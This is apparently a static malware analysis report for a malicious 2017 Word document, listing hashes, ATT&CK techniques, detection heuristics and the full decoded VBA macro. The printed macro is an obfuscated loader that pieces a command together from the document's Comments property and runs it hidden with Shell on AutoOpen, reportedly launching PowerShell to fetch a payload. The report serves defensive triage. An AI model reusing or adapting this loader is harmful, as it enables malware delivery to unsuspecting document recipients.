Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f62eeb0eff486480…

MALICIOUS

Office (OLE)

Size: 79.5 KB
Created: 2017-10-10 22:26:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: 7816f2992b448e40458669f1ec75e0c9
SHA-1: 00f5cee0af496ac235843bcac75c4989e891f77f
SHA-256: f62eeb0eff486480249ac5768d77419a5a3099bdd712a168a37d857bc05839f8
Risk score: 212

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and triggers the execution of a Shell() command, which in turn references PowerShell. This indicates the document is designed to download and execute a secondary payload. The ClamAV detection name 'Doc.Macro.DollarShell-6346616-0' further supports this analysis.

Heuristics (8)

  • ClamAV: Doc.Macro.DollarShell-6346616-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA (critical, OLE_VBA_SHELL)
    Matched lines in script:
      aBYsbtnzr = wKTVbW + skSkapXRiA + zuiVozHNME
      VBA.Shell$ aBYsbtnzr, 0
      End Sub
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    Matched lines in script:
      End Sub
      Sub AutoOpen()
      PinjEEHiY
  • Reference to PowerShell (high, SC_STR_POWERSHELL)
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8542 bytes
SHA-256: a9d608a226b560f4fcd0829005947a79efdced6f688c2a884428e875235c0f85
Detection
ClamAV: No threats found
Obfuscation or payload: likely
53 of 85 identifiers look randomly generated (e.g. 'jjHjqGFFpkh') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub PinjEEHiY()
jjHjqGFFpkh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7400, 53)
RDcwVJIQWYI = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 8122), 56)
GUzrRbJd = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12952), 58)
XBOoVJ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8757, 88)
MhtCsoCcsz = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10381), 143)
HzYQAl = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7748, 187)
FzHVnHAmvd = jjHjqGFFpkh + RDcwVJIQWYI + GUzrRbJd + XBOoVJ + MhtCsoCcsz + HzYQAl
LooiMwhF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2105, 91)
wojDWSGq = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8848, 127)
CiFVWKYK = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 8224), 7)
viwKu = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7575), 35)
XiRrkhTIh = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 216), 122)
iUpmE = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 5669), 104)
ciTLBZXl = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4461), 73)
PrZILnjLL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12249, 108)
AmMpGUf = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4304), 61)
IiWmRc = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 17586, 112)
csTzMl = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8680, 41)
iuShGatnFb = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 16282), 97)
WvEskH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10671, 195)
UmribYiST = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10556), 66)
ASzcaNTGil = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1809), 134)
pjDohnbOF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11521, 181)
VrDjFi = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10917), 199)
UlnuoXTi = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 2533), 37)
ArwlFBB = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1488, 88)
BfsEipKdk = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15109), 53)
OYqLPvCm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7183, 131)
OJwzFUJ = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 2707), 151)
ChhwqvbjFF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8434, 184)
jHBDcBnWKwP = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 14813), 180)
mVvHdUA = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6159), 83)
UvjZzQnOwjk = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6992), 128)
BvudTWNbD = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4686), 50)
fEZjZcli = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 13631), 192)
nFWCCXjwC = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16714, 187)
vHUAMAAd = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11289), 129)
QdItvrGo = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6847), 107)
GXuOpYaRzif = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 6557), 31)
AjwEfMckA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15839), 78)
WbOIHf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13557), 42)
hoRYMF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13328, 25)
ZjiDrOuHJw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1001, 153)
csKGFjrN = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14039, 51)
KTBXTuj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3053, 106)
wVXCBVOWH = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 18177), 27)
zItBf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4276), 177)
KSjOziHY = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13127, 93)
vazUa = FzHVnHAmvd + LooiMwhF + wojDWSGq + CiFVWKYK + viwKu + XiRrkhTIh + iUpmE + ciTLBZXl + PrZILnjLL + AmMpGUf + IiWmRc + csTzMl + iuShGatnFb + WvEskH + UmribYiST + ASzcaNTGil + pjDohnbOF + VrDjFi + UlnuoXTi + ArwlFBB + BfsEipKdk + OYqLPvCm + OJwzFUJ + ChhwqvbjFF + jHBDcBnWKwP + mVvHdUA + UvjZzQnOwjk + BvudTWNbD + fEZjZcli + nFWCCXjwC + vHUAMAAd + QdItvrGo + GXuOpYaRzif + AjwEfMckA + WbOIHf + hoRYMF + ZjiDrOuHJw + csKGFjrN + KTBXTuj + wVXCBVOWH + zItBf + KSjOziHY
QapXlAbQi = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10124, 56)
LChLu = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9937, 36)
iGWwVRHT = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 10052), 15)
izwTfFH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 18212, 47)
FZMbw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 5959), 77)
ziDNPEnAw = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15403), 190)
SFXPRv = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12513, 102)
lBljzaspbA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 12663), 125)
azmUYQrBZ = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11795), 184)
WNzoMhpHRRK = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 673), 174)
MCFmWPLzf = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4696, 103)
STDqADIMb = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5879, 57)
IWLFi = vazUa + QapXlAbQi + LChLu + iGWwVRHT + izwTfFH + FZMbw + ziDNPEnAw + SFXPRv + lBljzaspbA + azmUYQrBZ + WNzoMhpHRRK + MCFmWPLzf + STDqADIMb
qbPWtdwHOIz = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15774), 33)
zkFAqHYGf = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 9183), 40)
jOvUpwi = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16161, 25)
EXrkPmio = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12955), 2)
KlFEoDZs = IWLFi + qbPWtdwHOIz + zkFAqHYGf + jOvUpwi + EXrkPmio
pihdSPdwKZZ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9579, 5)
lDckUuT = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4010), 4)
okjjupwCM = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 16128), 4)
wKTVbW = KlFEoDZs + pihdSPdwKZZ + lDckUuT + okjjupwCM
skSkapXRiA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 17115), 1)
zuiVozHNME = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 614, 1)
aBYsbtnzr = wKTVbW + skSkapXRiA + zuiVozHNME
VBA.Shell$ aBYsbtnzr, 0
End Sub
Sub AutoOpen()
PinjEEHiY
End Sub